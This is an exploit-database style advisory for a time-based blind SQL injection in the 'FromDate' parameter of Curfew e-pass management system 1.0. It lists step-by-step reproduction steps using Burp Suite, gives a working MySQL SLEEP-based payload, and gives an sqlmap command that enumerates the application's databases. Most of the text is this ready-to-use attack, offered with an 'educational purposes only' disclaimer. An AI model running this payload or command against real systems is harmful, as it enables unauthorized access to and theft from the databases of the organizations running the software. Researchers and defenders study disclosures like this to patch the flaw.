Exploits / Vulnerability Discovered : 2024-02-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Curfew epass management system 1.0 fromdate sql injection is for educational purposes only and if it is used you will do on your own risk!
1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent
Curfew epass management system 1.0 fromdate sql injection